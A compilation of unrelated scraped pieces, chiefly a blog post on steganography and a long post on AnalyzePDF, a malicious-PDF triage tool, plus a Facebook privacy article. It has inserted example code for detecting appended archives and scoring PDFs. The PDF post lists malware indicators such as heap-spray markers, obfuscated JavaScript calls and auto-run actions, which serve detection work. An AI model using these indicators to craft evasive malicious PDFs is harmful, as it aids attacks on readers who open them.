TVCINITIALIZE.agc.html                            27-Jul-2009 19:49   69K
TVCMASSPROP.agc.html                              27-Jul-2009 19:49   37K
TVCRESTARTS.agc.html                              27-Jul-2009 19:49   45K
TVCROLLDAP.agc.html                               27-Jul-2009 19:49  101K
TVCSTROKETEST.agc.html                            27-Jul-2009 19:49   42K
UPDATE_PROGRAM.agc.html                           27-Jul-2009 19:49   95K
WAITLIST.agc.html                                 27-Jul-2009 19:49   86K

Source: Index of /apollo/listings/Comanche055
-
Steganography: The Art of Hiding Information

What with all of the spying and whatnot, we all need a private space for those things we do want to hide. Cryptography or encryption can be used to hide content, but it does not hide data from a third party; it makes the data unreadable by a third party. And then there is steganography, the science, or rather, the art of hiding data. You can, for example, hide files in an image, like so:

The command cat reads the image file (in this case technocracy.jpg) and the compressed directory littlesecrets.tar.gz and then concatenates image and compressed file together in a new file, makeithardertobespiedon.jpg (use any name you like). To get your files back, simply uncompress the makeithardertobespiedon image file. Obviously, combining the two, compressing an encrypted directory and concatenating it in an image file, makes it even harder to be spied on. You can do this yourself, using your chosen encryption scheme, then the above, or you can use a tool. If and when you use a tool, I recommend researching local laws on encryption and its exportation before use.

Tools

Steghide, for example, is a steganography program that is able to hide data in various kinds of image and audio files. The color (respectively sample) frequencies are not changed, thus making the embedding resistant against first-order statistical tests. Note that the steghide code is hosted on SourceForge, which was bought by Dice Holdings in 2012. I used the command line for steghide when I experimented with it, but there are graphical front-ends. I haven't tried those. More tools can be found here (comparison table). My requirements would be:
- FOSS licensed (preferably GNU licensed)
- cross-platform (must run on GNU/Linux)
- support of additional cryptography

Detectable?

In 2001 Niels Provos searched for images that might contain hidden messages using stegdetect and stegbreak. As said, we are making it harder. A lot harder. But …

For every clever method and tool being developed to hide information in multimedia data, an equal number of clever methods and tools are being developed to detect and reveal its secrets. ~ Cyber Warfare: Steganography vs. Steganalysis (pdf)

More on steganography
- The Black Chamber
- Detecting Steganographic Content on the Internet (pdf)
- Computer Forensics, Cybercrime and Steganography Resources: Steganography & Data Hiding – Links & Whitepapers (latest entry from 2008)
- An Overview of Steganography for the Computer Forensics Examiner
- Cyber Warfare: Steganography vs. Steganalysis (pdf)

Source: https://lilithlela.cyberguerrilla.org/?p=6620
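The cat trick above leaves the archive sitting after the JPEG's end-of-image marker, which is also how it gets spotted. The following is an added example, not part of the original post: it walks the JPEG segment structure to find where the image really ends, reports anything appended after EOI, and carves a concatenated .tar.gz back out. The image bytes and the archive are constructed inline, and the file names are the post's.

```python
"""Find data appended after a JPEG's EOI marker (the residue of the cat trick)
and carve it back out. Added example; the image and archive are constructed."""
import io
import struct
import tarfile

EOI, SOS = 0xD9, 0xDA
GZIP_MAGIC = b"\x1f\x8b"


def jpeg_end_offset(data: bytes) -> int:
    """Walk the segment structure and return the offset just past EOI.

    Searching for FF D9 is not enough: an EXIF thumbnail inside APP1 is a
    complete JPEG with its own EOI, so the walk honours segment lengths.
    """
    if data[:2] != b"\xff\xd8":
        raise ValueError("not a JPEG: missing SOI")
    pos = 2
    while pos + 2 <= len(data):
        if data[pos] != 0xFF:
            raise ValueError(f"expected a marker at offset {pos}")
        marker = data[pos + 1]
        if marker == 0xFF:                               # fill byte before a marker
            pos += 1
            continue
        if marker == EOI:
            return pos + 2
        if marker == 0x01 or 0xD0 <= marker <= 0xD8:     # TEM, RSTn, SOI: no length
            pos += 2
            continue
        if pos + 4 > len(data):
            break
        (seg_len,) = struct.unpack(">H", data[pos + 2:pos + 4])
        pos += 2 + seg_len
        if marker == SOS:
            # Entropy-coded data: 0xFF is followed by 0x00 (stuffing) or an
            # RSTn marker; anything else is the next real marker.
            while pos + 1 < len(data):
                nxt = data[pos + 1]
                if data[pos] == 0xFF and nxt != 0x00 and not 0xD0 <= nxt <= 0xD7:
                    break
                pos += 1
    raise ValueError("truncated JPEG: no EOI found")


def appended_payload(data: bytes) -> bytes:
    """Everything after the image proper; empty means nothing was appended."""
    return data[jpeg_end_offset(data):]


def carve_tar_gz(data: bytes) -> list:
    """If a .tar.gz was concatenated after the image, return its member names."""
    tail = appended_payload(data)
    if not tail.startswith(GZIP_MAGIC):
        return []
    with tarfile.open(fileobj=io.BytesIO(tail), mode="r:gz") as tar:
        return tar.getnames()


def _segment(marker: int, payload: bytes) -> bytes:
    return b"\xff" + bytes([marker]) + struct.pack(">H", len(payload) + 2) + payload


def build_sample_image() -> bytes:
    """Structurally valid (not decodable) JPEG, constructed for this example."""
    app0 = _segment(0xE0, b"JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00")
    # APP1 with a decoy thumbnail: it contains FF D9, which a naive search hits
    app1 = _segment(0xE1, b"Exif\x00\x00" + b"\xff\xd8\xff\xd9")
    sos = _segment(SOS, b"\x01\x01\x00\x00\x3f\x00")
    scan = b"\x12\x34\xff\x00\x56\xff\xd0\x78"          # stuffed FF 00 plus an RST0
    return b"\xff\xd8" + app0 + app1 + sos + scan + b"\xff\xd9"


def build_sample_tarball() -> bytes:
    """The post's littlesecrets.tar.gz, built in memory with constructed content."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tar:
        content = b"nothing to see here\n"
        info = tarfile.TarInfo("littlesecrets/note.txt")
        info.size = len(content)
        tar.addfile(info, io.BytesIO(content))
    return buf.getvalue()


CLEAN_IMAGE = build_sample_image()
# what `cat technocracy.jpg littlesecrets.tar.gz > makeithardertobespiedon.jpg` yields
SUSPECT_IMAGE = CLEAN_IMAGE + build_sample_tarball()

if __name__ == "__main__":
    for name, img in (("clean", CLEAN_IMAGE), ("suspect", SUSPECT_IMAGE)):
        print(f"{name}: {len(appended_payload(img))} bytes after EOI,"
              f" archive members: {carve_tar_gz(img)}")
```

Note that `tar xzf` on the combined file fails because gzip expects its magic at offset 0; carving from the EOI offset, as `carve_tar_gz` does, is what actually recovers the archive.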
-
[h=3]AnalyzePDF - Bringing the Dirt Up to the Surface[/h]

[h=2]What is that thing they call a PDF?[/h]
The Portable Document Format (PDF) is an old format ... it was created by Adobe back in 1993 as an open standard but wasn't officially released as an open standard (ISO 32000-1) until 2008 - right @nullandnull? I can't take credit for the nickname that I call it today, Payload Delivery Format, but I think it's clever and applicable enough to mention. I did a lot of painful reading through the PDF specifications in the past and if you happen to do the same I'm sure you'll also have a lot of "hm, that's interesting" thoughts as well as many "wtf, why?" thoughts. I truly encourage you to go out and do the same... it's a great way to learn about the internals of something, what to expect and what would be abnormal.

The PDF has become a de facto standard for transferring files, presentations, whitepapers etc. <rant> How about we stop releasing research/whitepapers about PDF 0-days/exploits via a PDF file... seems a bit backwards</rant>

We've all had those instances where you wonder if that file is malicious or benign ... do you trust the sender or was it downloaded from the Internet? Do you open it or not? We might be a bit more paranoid than most people when it comes to this type of thing, but since they're so common they're still a reliable means for a delivery method by malicious actors. As the PDF contains many 'features', these features often turn into 'vulnerabilities' (Do we really need to embed an exe into our PDF? or play a SWF game?). Good thing it doesn't contain any vulnerabilities, right?
(to be fair, the sandboxed versions and other security controls these days have helped significantly)
Adobe Acrobat Reader : CVE security vulnerabilities, versions and detailed reports

[h=3]What does a PDF consist of?[/h]
In its most basic format, a PDF consists of four components: header, body, cross-reference table (Xref) and trailer:
(sick M$ Paint skillz, I know)
If we create a simple PDF (this example only contains a single word in it) we can get a better idea of the contents we'd expect to see:

[h=2]What else is out there?[/h]
Since PDF files are so common these days there's no shortage of tools to rip them apart and analyze them. Some of the information contained in this post and within the code I'm releasing may overlap with others out there but that's mainly because our research produced similar results or our minds think alike... I'm not going to touch on every tool out there but there are some that are worth mentioning as I either still use them in my analysis process or some of their functionality/lack of functionality is what sparked me to write AnalyzePDF. By mentioning the tools below my intention isn't to downplay them and/or their ability to analyze PDFs but rather to help show the reasons I ended up doing what I did.

[h=4]pdfid/pdf-parser[/h]
Didier Stevens created some of the first analysis tools in this space, which I'm sure you're already aware of. Since they're bundled into distros like BackTrack/REMnux already they seem like good candidates to leverage for this task. Why recreate something if it's already out there? Like some of the other tools, it parses the file structure and presents the data to you... but it's up to you to be able to interpret that data. Because these tools are commonly available on distros and get the job done I decided they were the best to wrap around. Did you know that pdfid has a lot more capabilities/features that most aren't aware of? If you run it with the (-h) switch you'll see some other useful options such as (-e), which displays extra information. Of particular note here is the mention of "%%EOF", "After last %%EOF", create/mod dates and the entropy calculations.

During my data gathering I encountered a few hiccups that I hadn't previously experienced. This is expected as I was testing a large data set of who knows what kind of PDFs. Again, I'm not noting these to put down anyone's tools but I feel it's important to be aware of what the capabilities and limitations of something are - and also in case anyone else runs into something similar so they have a reference. Because of some of these, I am including a slightly modified version of pdfid as well. I haven't tested if the newer version fixed anything so I'd rather give the files that I know work with it for everyone.
- I first experienced a similar error as mentioned here when using the (-e) option on a few files (e.g. - cbf76a32de0738fea7073b3d4b3f1d60).
- It appears it doesn't count multiple '%%EOF's since if the '%%EOF' is the last thing in the file without a '\r' or '\n' behind it, it doesn't seem to count it.
- I've had cases where the '/Pages' count was incorrect - there were (15) PDFs that showed '0' pages during my tests. One way I tried to get around this was to use the (-a) option and test between the '/Page' and '/Pages' values. (e.g. - ac0487e8eae9b2323d4304eaa4a2fdfce4c94131)
- There were times when the number of characters after the last '%%EOF' was incorrect
- Won't flag on JavaScript if it's written like "<script contentType="application/x-javascript">" (e.g. - cbf76a32de0738fea7073b3d4b3f1d60):

[h=4]peepdf[/h]
Peepdf has gone through some great development over the course of me using it and definitely provides some great features to aid in your analysis process. It has some intelligence built into it to flag on things and also allows one to decode things like JavaScript from the current shell. Even though it has a batch/automated mode to it, it still feels like more of a tool that I want to use to analyze a single PDF at a time and dig deep into the file's internals. Originally, this tool didn't match keywords if they had spaces after them but it was a quick and easy fix... glad this testing could help improve another user's work.

[h=4]PDFStreamDumper[/h]
PDFStreamDumper is a great tool with many sweet features but it has its uses and limitations like all things. It's a GUI and built for analysis on Windows systems which is fine but its power comes from analyzing a single PDF at a time - and again, it's still mostly a manual process.

[h=4]pdfxray/pdfxray_lite[/h]
Pdfxray was originally an online tool but Brandon created a lite version so it could be included in REMnux (it used to be publicly accessible but at the time of writing this it looks like that might have changed). If you look back at some of Brandon's work historically he's also done a lot in this space as well, and since I encountered some issues with other tools and noticed he did as well in the past I know he's definitely dug deep and used that knowledge for his tools. Pdfxray_lite has the ability to query VirusTotal for the file's hash and produce a nice HTML report of the file's structure - which is great if you want to include that in an overall report but again this requires the user to interpret the parsed data.

[h=4]pdfcop[/h]
Pdfcop is part of the Origami framework. There are some really cool tools within this framework but I liked the idea of analyzing a PDF file and alerting on badness. This particular tool in the framework has that ability, however, I noticed that if it flagged on one cause then it wouldn't continue analyzing the rest of the file for other things of interest (e.g. - I've had it close the file out right away if there was an invalid Xref without looking at anything else. This is because PDFs are read from the bottom up, meaning their Xref tables are read first in order to determine where to go next). I can see the argument of saying why continue to analyze the file if it was already flagged bad but I feel like that's too much tunnel vision for me. I personally prefer to know more than less... especially if I want to do trending/stats/analytics.

[h=2]So why create something new?[/h]
While there is a wealth of PDF analysis tools these days, there was a noticeable gap of tools that have some intelligence built into them in order to help automate certain checks or alert on badness. In fairness, some (try to) detect exploits based on keywords or flag suspicious objects based on their contents/names but that's generally the extent of it. I use a lot of the above mentioned tools when I'm in the situation where I'm handed a file and someone wants to know if it's malicious or not... but what about when I'm not around? What if I'm focused/dedicated to something else at the moment? What if there are wayyyy too many files for me to manually go through each one? Those are the kinds of questions I had to address and as a result I felt I needed to create something new. Not necessarily write something from scratch... I mean why waste that time if I can leverage other things out there and tweak them to fit my needs?

[h=3]Thought Process[/h]
What do people typically do when trying to determine if a PDF file is benign or malicious? Maybe scan it with A/V and hope something triggers, run it through a sandbox and hope the right conditions are met to trigger, or take them one at a time through one of the above mentioned tools? They're all fine workflows but what if you discover something unique or come across it enough times to create a signature/rule out of it so you can trigger on it in the future? We tend to have a lot to remember so doing the analysis as one-offs may result in us forgetting something that we previously discovered. Additionally, this doesn't scale too well in the sense that everyone on your team might not have the same knowledge that you do... so we need some consistency/intelligence built in to try and compensate for these things.

I felt it was better to use the characteristics of a malicious file (either known or observed from combinations within malicious files) to evaluate what would indicate a malicious file, instead of just adding points for every questionable attribute observed. e.g. - instead of adding a point for being a one page PDF, make a condition to say if you see an invalid xref and a one page PDF then give it a score of X. This makes the conditions more accurate in my eyes; since, for example: a single paged PDF by itself isn't malicious but if it also contains other things of question then it should have a heavier weight of being malicious. Another example is JavaScript within a PDF. While statistics show JavaScript within a PDF is a high indicator that it's malicious, there are still legitimate reasons for JavaScript to be within a PDF (e.g. - to calculate a purchase order form or verify that you correctly entered all the required information the PDF requires).

[h=3]Gathering Stats[/h]
At the time I was performing my PDF research and determining how I wanted to tackle this task I wasn't really aware of machine learning. I feel this would be a better path to take in the future but the way I gathered my stats/data was in a similar (less automated/cool AI) way. There's no shortage of PDFs out there which is good for us as it can help us to determine what's normal, malicious, or questionable and leverage that intelligence within a tool. If you need some PDFs to gather some stats on, contagio has a pretty big bundle to help get you started. Another resource is Govdocs from Digital Corpora ... or a simple Google dork. (Note: spidering/downloading these will give you files but they still need to be classified as good/bad for initial testing.) Be aware that you're going to come across files that someone may mark as good but actually show signs of badness... always interesting to detect these types of things during testing!

[h=4]Stat Gathering Process[/h]
So now that I have a large set of files, what do I do now? I can't just rely on their file extensions or someone else saying they're malicious or benign so how about something like this:
1. Verify it's a PDF file. When reading through the PDF specs I noticed that the PDF header can be within the first 1024 bytes of the file as stated in "3.4.1, 'File Header' of Appendix H - 'Acrobat viewers require only that the header appear somewhere within the first 1024 bytes of the file.'"... that's a long way down compared to the traditional header which is usually right at the beginning of a file. So what's that mean for us? Well if we rely solely on something like file or TRiD they _might_ not properly identify/classify a PDF that has the header that far into the file as most only look within the first 8 bytes (unfair example is from corkami). We can compensate for this within our code/create a YARA rule etc.... you don't believe me you say? Fair enough, I don't believe things unless I try them myself either:
   The file to the left is properly identified as a PDF file but when I created a copy of it and modified it so the header was a bit lower, the tools failed. The PDF on the right is still in accordance with the PDF specs and PDF viewers will still open it (as shown)... so this needs to be taken into consideration.
2. Get rid of duplicates (based on SHA256 hash) for files in the same category (clean vs. dirty), then again across the entire data set afterwards to make sure there are no duplicates between the clean and dirty sets.
3. Run pdfid & pdfinfo over the file to parse out their data. These two are already included in REMnux so I leveraged them. You can modify them to other tools but this made it flexible for me and I knew the tool would work when run on this distro; pdfinfo parsed some of the data better during tests so getting the best of both of them seemed like the best approach.
4. Run scans for low hanging fruit/known badness with local A/V || YARA

Now that we have a more accurate data set classified:
- Are all PDFs classified as benign really benign?
- Are all PDFs classified as malicious really malicious?

[h=3]Stats[/h]
Files analyzed (no duplicates found between clean & dirty):

Class   Type       Count
Dirty   Pre-Dup    22,342
Dirty   Post-Dup   11,147
Clean   Pre-Dup     2,530
Dirty   Post-Dup    2,529
Total Files Analyzed: 13,676

I've collected more than enough data to put together a paper or presentation but I feel that's been played out already so if you want more than what's outlined here just ping me. Instead of dragging this post on for a while showing each and every stat that was pulled I feel it might be more useful to show a high level comparison of what was detected the most in each set and some anomalies.

[h=4]Ah-Ha's[/h]
- None of the clean files had incorrect file headers/versions
- There wasn't a single keyword/attribute parsed from the clean files that covered more than 4.55% of its entire data set class. This helps show the uniqueness of these files vs. malicious actors reusing things.
- The dates within the clean files were generally unique while the date fields on the dirty files were more clustered together - again, reuse?
- None of the values for the keywords/attributes of the clean files were flagged as trying to be obfuscated by pdfid
- Clean files never had '/Colors > 2^24' above 0 while some dirty files did
- Rarely did a clean file have a high count of JavaScript in it while dirty files ranged from 5-149 occurrences per file
- '/JBIG2Decode' was never above '0' in any clean file
- '/Launch' wasn't used much in either of the data sets but still more common in the dirty ones
- Dirty files have far more characters after the last %%EOF (starting from 300+ characters is a good check)
- Single page PDFs have a higher likelihood of being malicious - no duh
- '/OpenAction' is far more common in malicious files

[h=4]YARA signatures[/h]
I've also included some PDF YARA rules that I've created as a separate file so you can use those to get started. YARA isn't really required but I'm making it that way for the time being because it's helpful... so I have the default rules location pointing to REMnux's copy of MACB's rules unless otherwise specified.
Clean data set:
Dirty data set:
Signatures that triggered across both data sets:
Cool... so we know we have some rules that work well and others that might need adjusting, but they still help!

[h=4]What to look for[/h]
So we have some data to go off of... what are some additional things we can take away from all of this and incorporate into our analysis tool so we don't forget about them and/or stop repetitive steps?

- Header
  In addition to being after the first 8 bytes I found it useful to look at the specific version within the header. This should normally look like "%PDF-M.N." where M.N is the Major/Minor version... however, the above mentioned 'low header' needs to be looked for as well. Knowing this we can look for invalid PDF version numbers or, digging deeper, we can correlate the PDF's features/elements to the version number and flag on mismatches. Here are some examples of what I mean, and more reasons why reading those dry specs is useful:
  - If FlateDecode was introduced in v1.2 then it shouldn't be in any version below
  - If JavaScript and EmbeddedFiles were introduced in v1.3 then they shouldn't be in any version below
  - If JBIG2 was introduced in v1.4 then it shouldn't be in any version below
- Body
  This is where all of the data is (supposed to be) stored; objects (strings, names, streams, images etc.). So what kinds of semi-intelligent things can we do here?
  - Look for object/stream mismatches. e.g. - Indirect Objects must be represented by 'obj' and 'endobj' so if the number of 'obj' is different than the number of 'endobj' mentions then it might be something of interest
  - Are there any questionable features/elements within the PDF? JavaScript doesn't immediately make the file malicious as mentioned earlier, however, it's found in ~90% of malicious PDFs based on others' and my own research.
    - '/RichMedia' - indicates the use of Flash (could be leveraged for heap sprays)
    - '/AA', '/OpenAction', '/AcroForm' - indicate that an automatic action is to be performed (often used to execute JavaScript)
    - '/JBIG2Decode', '/Colors' - could indicate the use of vulnerable filters; based on the data above maybe we should look for colors with a value greater than 2^24
    - '/Launch', '/URL', '/Action', '/F', '/GoToE', '/GoToR' - opening external programs, places to visit and redirection games
  - Obfuscation
    - Multiple filters ('/FlateDecode', '/ASCIIHexDecode', '/ASCII85Decode', '/LZWDecode', '/RunLengthDecode'). The streams within a PDF file may have filters applied to them (usually for compressing/encoding the data). While this is common, it's not common within benign PDF files to have multiple filters applied. This behavior is commonly associated with malicious files to try and thwart A/V detection by making them work harder.
    - Separating code over multiple objects
    - Placing code in places it shouldn't be (e.g. - Author, Keywords etc.)
    - White space randomization
    - Comment randomization
    - Variable name randomization
    - String randomization
    - Function name randomization
    - Integer obfuscation
    - Block randomization
  - Any suspicious keywords that could mean something malicious when seen with others? eval, array, String.fromCharCode, getAnnots, getPageNumWords, getPageNthWords, this.info, unescape, %u9090
- Xref
  The first object has an ID 0 and always contains one entry with generation number 65535. This is at the head of the list of free objects (note the letter 'f' that means free). The last object in the cross reference table uses the generation number 0. Translation please? Take a look at the following Xref:
  Knowing how it's supposed to look we can search for Xrefs that don't adhere to this structure.
- Trailer
  - Provides the offset of the Xref (startxref)
  - Contains the EOF, which is supposed to be a single line with "%%EOF" to mark the end of the trailer/document. Each trailer will be terminated by these characters and should also contain the '/Prev' entry which will point to the previous Xref.
  - Any updates to the PDF usually result in appending additional elements to the end of the file. This makes it pretty easy to determine PDFs with multiple updates or additional characters after what's supposed to be the EOF
- Misc.
  - Creation dates (both format and if a particular one is known to be used)
  - Title
  - Author
  - Producer
  - Creator
  - Page count

[h=2]The Code[/h]
So what now? We have plenty of data to go on - some previously known, but some extremely new and helpful. It's one thing to know that most files with JavaScript or that are (1) page have a higher tendency of being malicious... but what about some of the other characteristics of these files? By themselves, a single keyword/attribute might not stick out that much but what happens when you start to combine them together? Welp, hang on because we're going to put this all together.

[h=3]File Identification[/h]
In order to account for the header issue, I decided the tool itself would look within the first 1024 bytes instead of relying on other file identification tools:
Another way, so this could be detected whether this tool was used or not, was to create a YARA rule such as:

[h=3]Wrap pdfinfo[/h]
Through my testing I found this tool to be more reliable in some areas as opposed to pdfid, such as:
- Determining if there are any Xref errors produced when trying to read the PDF
- Looking for any unterminated hex strings etc.
- Detecting EOF errors

[h=3]Wrap pdfid[/h]
- Read the header. *pdfid will show exactly what's there and not try to convert it*
- _attempt_ to determine the number of pages
- Look for object/stream mismatches
- Not only look for JavaScript but also determine if there's an abnormally high amount
- Look for other suspicious/commonly used elements for malicious purposes (AcroForm, OpenAction, AdditionalAction, Launch, Embedded files etc.)
- Look for data after EOF
- Calculate a few different entropy scores
Next, perform some automagical checks and hold on to the results for later calculations.

[h=3]Scan with YARA[/h]
While there are some pre-populated conditions that score a ranking built into the tool already, the ability to add/modify your own is extremely easy. Additionally, since I'm a big fan of YARA I incorporated it into this as well. There are many benefits of this such as being able to write a rule for header evasion, version number mismatching to elements or even flagging on known malicious authors or producers. The biggest strength, however, is the ability to add a 'weight' field in the meta section of the YARA rules. What this does is allow the user to determine how good of a rule it is and if the rule triggers on the PDF, then hold on to its weighted value and incorporate it later in the overall calculation process which might increase its maliciousness score. Here's what the YARA parsing looks like when checking the meta field:
And here's another YARA rule with that section highlighted for those who aren't sure what I'm talking about:
If the (-m) option is supplied then if _any_ YARA rule triggers on the PDF file it will be moved to another directory of your choosing. This is important to note because one of your rules may hit on the file but it may not be displayed in the output, especially if it doesn't have a weight field.

Once the analysis has completed the calculation process starts. This is two phase:
- Anything noted from pdfinfo and pdfid is evaluated against some pre-determined combinations I configured. These are easy enough to modify as needed but they've been very reliable in my testing... but hey, things change! Instead of moving on once one of the combination sets is met I allow the scoring to go through each one and add the additional points to the overall score, if warranted. This allows several 'smaller' things to bundle up into something of interest rather than passing them up individually.
- Any YARA rule that triggered on the PDF file has its weighted value parsed from the rule and added to the overall score. This helps bump up a file's score or immediately flag it as suspicious if you have a rule you really want to alert on.

So what's it look like in action? Here's a picture I tweeted a little while back of it analyzing a PDF exploiting CVE-2013-0640:

[h=3]Download[/h]
I've had this code for quite a while and haven't gotten around to writing up a post to release it with but after reading a former coworker's blog post last night I realized it was time to just write something up and get this out there as there are still people asking for something that employs some of the capabilities (e.g. - weight ranking). Is this 100% right all the time? No... let's be real. I've come across situations where a file that was benign was flagged as malicious based on its characteristics and that's going to happen from time to time. Not all PDF creators adhere to the required specifications and some users think it's fun to embed or add things to PDFs when it's not necessary. What this helps to do is give a higher ranking to files that require closer attention or help someone determine if they should open a file right away vs. send it to someone else for analysis (e.g. - deploy something like this on a web server somewhere and let the user upload their questionable file to it and get back a "yes it's ok -or- no, sending it for analysis").

AnalyzePDF can be downloaded on my github

[h=2]Further Reading[/h]
- Research papers (one | two | three) [PDF]
- PDFTricks
- PDF Overview

Posted by hiddenillusion at 9:44 PM
Source: :: hiddenillusion ::: AnalyzePDF - Bringing the Dirt Up to the Surface
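To make the header, body, xref and trailer checks from "What to look for" and the combination scoring from "The Code" concrete, here is an added example in Python. It is not AnalyzePDF's or pdfid's code; its weights, keyword set and the two tiny sample PDFs are constructed for illustration.

```python
"""PDF triage along the lines the post describes, added here as an example (not
AnalyzePDF's or pdfid's code): header anywhere in the first 1024 bytes, feature
vs. version mismatches, obj/endobj balance, startxref sanity, data after the last
%%EOF, and combination scoring. Weights and sample PDFs are constructed."""
import re

HEADER_RE = re.compile(rb"%PDF-(\d)\.(\d)")
# version in which each feature was introduced, as listed in the post
FEATURE_MIN_VERSION = {b"/FlateDecode": (1, 2), b"/JavaScript": (1, 3),
                       b"/EmbeddedFiles": (1, 3), b"/JBIG2Decode": (1, 4)}
FILTERS = (b"/FlateDecode", b"/ASCIIHexDecode", b"/ASCII85Decode",
           b"/LZWDecode", b"/RunLengthDecode")
KEYWORDS = (b"/JS", b"/JavaScript", b"/OpenAction", b"/AA")


def count_name(data: bytes, name: bytes) -> int:
    """Count a PDF name token; the lookahead keeps /JS from matching /JSxyz."""
    return len(re.findall(re.escape(name) + rb"(?![A-Za-z0-9])", data))


def find_header(data: bytes):
    """(offset, (major, minor)) if the header starts within 1024 bytes, else None."""
    m = HEADER_RE.search(data[:1024 + 8])
    if m is None or m.start() >= 1024:
        return None
    return m.start(), (int(m.group(1)), int(m.group(2)))


def startxref_is_valid(data: bytes) -> bool:
    """Does the last startxref offset land on an xref table or an xref stream?"""
    offsets = re.findall(rb"startxref\s+(\d+)", data)
    if not offsets:
        return False
    at = data[int(offsets[-1]):][:32]
    return at.startswith(b"xref") or re.match(rb"\d+ \d+ obj", at) is not None


def bytes_after_last_eof(data: bytes) -> int:
    """Characters after the final %%EOF, ignoring line endings; -1 if no %%EOF."""
    idx = data.rfind(b"%%EOF")
    return -1 if idx < 0 else len(data[idx + 5:].strip(b"\r\n"))


def analyze(data: bytes) -> dict:
    hdr = find_header(data)
    version = hdr[1] if hdr else None
    page_counts = [int(c) for c in re.findall(rb"/Count\s+(\d+)", data)]
    f = {n.decode(): count_name(data, n) for n in KEYWORDS}
    f.update(
        header_offset=hdr[0] if hdr else None, version=version,
        version_mismatches=[n.decode() for n, v in FEATURE_MIN_VERSION.items()
                            if version and version < v and count_name(data, n)],
        obj=len(re.findall(rb"\bobj\b", data)),
        endobj=len(re.findall(rb"\bendobj\b", data)),
        pages=max(page_counts, default=0),
        filters_used=sum(1 for x in FILTERS if count_name(data, x)),
        xref_ok=startxref_is_valid(data), after_eof=bytes_after_last_eof(data))
    return f


def score(f: dict):
    """Each matching combination adds its weight, so several weak signals add up."""
    hits = []
    if f["header_offset"] is None:
        hits.append(("no %PDF header within the first 1024 bytes", 5))
    elif f["header_offset"] > 0:
        hits.append((f"header hidden at offset {f['header_offset']}", 3))
    for name in f["version_mismatches"]:
        hits.append((f"{name} used in PDF {f['version'][0]}.{f['version'][1]}", 2))
    if f["obj"] != f["endobj"]:
        hits.append(("obj/endobj count mismatch", 2))
    if not f["xref_ok"] and f["pages"] == 1:
        hits.append(("invalid xref on a one-page PDF", 3))
    if (f["/JS"] or f["/JavaScript"]) and (f["/OpenAction"] or f["/AA"]):
        hits.append(("JavaScript combined with an automatic action", 4))
    if f["filters_used"] >= 2:
        hits.append(("multiple stream filters in use", 2))
    if f["after_eof"] >= 300:
        hits.append((f"{f['after_eof']} bytes after the last %%EOF", 2))
    return sum(w for _, w in hits), hits


def build_pdf(header: bytes, objects: bytes, xref_valid: bool, trailing=b"") -> bytes:
    # tiny constructed PDF; the objects are not meant to render
    body = header + objects
    xref_off = len(body) if xref_valid else 999999   # bogus offset = invalid xref
    body += b"xref\n0 1\n0000000000 65535 f \ntrailer << /Size 1 /Root 1 0 R >>\n"
    return body + b"startxref\n%d\n%%%%EOF\n" % xref_off + trailing


BENIGN = build_pdf(
    b"%PDF-1.4\n",
    b"1 0 obj << /Type /Catalog /Pages 2 0 R >> endobj\n"
    b"2 0 obj << /Type /Pages /Count 2 >> endobj\n"
    b"3 0 obj << /Length 0 /Filter /FlateDecode >> stream\nendstream endobj\n",
    xref_valid=True)
SUSPECT = build_pdf(
    b" " * 600 + b"%PDF-1.2\n",                       # header pushed past byte 8
    b"1 0 obj << /Type /Catalog /Pages 2 0 R /OpenAction 4 0 R >> endobj\n"
    b"2 0 obj << /Type /Pages /Count 1 >> endobj\n"
    b"4 0 obj << /S /JavaScript /JS (placeholder) >> endobj\n"
    b"3 0 obj << /Length 0 /Filter [/ASCIIHexDecode /FlateDecode] >> stream\nendstream endobj\n"
    b"5 0 obj << >>\n",                                # no matching endobj
    xref_valid=False, trailing=b"A" * 400)
```

Running `score(analyze(SUSPECT))` yields seven hits for a total of 18, while the benign sample scores 0; a YARA weight field as described in the post would simply be one more `hits.append` with the rule's weight.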
-
Didn't Read Facebook's Fine Print? Here's Exactly What It Says The Huffington Post | By Amanda Scherker So, like every other one of the world's 1.28 billion monthly active Facebook users, you blindly agreed to Facebook's Terms and Conditions without reading the fine print. You entrusted your photo albums, private messages and relationships to a website without reading its policies. And you do the same with every other site ... sound about right? In your defense, Carnegie Mellon researchers determined that it would take the average American 76 work days to read all the privacy policies they agreed to each year. So you're not avoiding the reading out of laziness; it's literally an act of job preservation. So here are the Cliffs Notes of what you agreed to when you and Facebook entered into this contract. Which, by the way, began as soon as you signed up: Nothing you do on Facebook is private. Repeat: Nothing you do on Facebook is private. Note the rather vague use of the word "infer," which Oxford Dictionary defines as "Deduce or conclude (information) from evidence and reasoning rather than from explicit statements." That includes some things you haven't even done yet. Facebook has even begun studying messages that you type but end up deciding not to post. A recent study by a Facebook data analyst looked at habits of 3.9 million English-speaking Facebook users to analyze how different users "self-censor" on Facebook. They measured the frequency of "aborted" messages or status posts, i.e., posts that were deleted before they ever were published. They studied this because "[Facebook] loses value from the lack of content generation," and they hoped to determine how to limit this kind of self-censorship in the future. While a Facebook spokesman told Slate that the network is not monitoring the actual substance of these messages, Facebook was able to determine when characters were typed, and whether they were posted within ten minutes of being typed. 
Even if you leave the network, not all your information does. Your Facebook footprint doesn't necessarily disappear if you deactivate your account. According to the site's Statement of Rights and Responsibilities, if your videos or photos have been shared by other users, they will remain visible on the site after you deactivate your account, and are subject to that user's privacy settings. Your information lets Facebook sell the power of your profile to brands and companies. This means that Facebook is being paid for supplying your endorsement (which you indicate by liking a page) to brands or companies. You can even find out how much your data is worth to Facebook by using the FBME application from Disconnect, Inc. And a report from The Center For Digital Democracy shows marketing companies are taking note, creating algorithms for determining key social media "influencers." The report found that many marketers have identified multicultural youth users as key influencers, and have targeted those demographics with heavier social media marketing. You're also giving Facebook the ability to track your web surfing anytime you're logged into the site. This announcement came in a recent post from Facebook. Facebook notes that other websites do the same thing. But that accounts for an insane amount of potential data, especially given the growth of Facebook mobile use. On average, Facebook mobile users check the site 14 times a day on their devices. Facebook also uses strategic partnerships to track your purchases in real life. Last year, Facebook started partnering with data broker firms. Data brokers earn their money by selling the power of your consumer habits and monitoring your online and offline spending. Facebook's partnership allows them to measure the correlation between the ads you see on Facebook and the purchases you make in-store -- and determine whether you're actually buying in real life the things you're seeing digitally while using Facebook. 
